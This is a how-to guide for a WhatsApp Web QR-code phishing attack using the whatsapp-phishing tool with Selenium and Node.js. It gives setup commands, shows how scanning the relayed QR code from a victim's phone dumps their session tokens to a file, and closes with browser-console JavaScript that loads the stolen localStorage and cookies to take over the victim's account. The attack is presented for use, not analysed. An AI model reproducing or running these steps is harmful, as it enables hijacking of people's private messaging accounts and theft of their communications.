What it does?

It extracts the QR code from Whatsapp Web and display it on a new page. If someone scans the code using Whatsapp it will grab the credentials from the web client and save them in a file. You can use these credentials to log yourself in as the person who scanned to QR code.

How whatsapp-phishing work?

The program uses node.js and socket.io for the website and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client.
The program starts a http and a socket.io server. If a new client connects to socket.io the application will make a request to a selenium instance to start a new browser and connect to web.whatsapp.com. It will fetch the QR code data and send it to the client via the websocket connection. The client javascript then shows the QR code to the user.
If the QR code gets scanned Whatsapp will authenticate the selenium controlled browser and store some tokens in the localStorage and document.cookie. We extract that data and save it into a text file.

Things required for this attack

  • Kali Linux
  • Firefox browser
  • Selenium server standalone
  • Node.js
  • NPM(Node Package Manager)
If you don’t have Kali Linux then please refer to the link below on a quick tutorial on how to run Kali off a USB Device
How to install Kali Linux on a USB – http://docs.kali.org/downloading/kali-linux-live-usb-install



Steps to perform this attack


  • Boot into Kali Linux. Open a terminal. Change the directory to Desktop and clone whatsapp-phising using git clone command
The commands are as follows
cd Desktop
git clone https://github.com/mawalu/whatsapp-phishing
  • Download selenium standalone server jar file from here. I have used the v2.53.0 in this attack
  • Now we will install Node.js and NPM(Node Package Manager)
Open terminal and type the following commands
apt-get install nodejs
apt-get install npm
apt-get install nodejs-legacy
  • Now we will use NPM. Change directory to whatsapp-phishing and use npm install
npm install
  • Start the selenium server. Open terminal go to whatsapp-phishing and run node index.js
Open a terminal and change directory to Downloads and type the following command to start the selenium server
java -jar selenium-server-standalone-2.53.0.jar
Make sure that selenium server is up and running like this. Don’t close this terminal
Once you have the server up and running. Open a new terminal and enter the following commands after changing directory to whatsapp-phishing
node index.js
You should see something like this. Don’t close this terminal either.
  • It’s time to test our setup.
Open Firefox browser and goto localhost:8080
Wait unitl you see something like this
  • Scan this QR Code from the Victim’s phone and wait for this
  • Now goto the whatsapp-phishing folder and open the secrets.txt file
  • Copy the contents of secrets.txt file and start Firefox browser
Goto www.web.whatsapp.com and open console (Ctrl + Shift + I)
Firefox doesn’t allows pasting so just type “allow pasting“(without quotes) and you can paste the contents now.
Enter the following
var t = CONTENT_COPIED_FROM_THE_SECRETS_FILE
  • Type the following codes exactly
function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}
login(t)
  •  Refresh the page and you will be logged in to victim’s whatsapp account.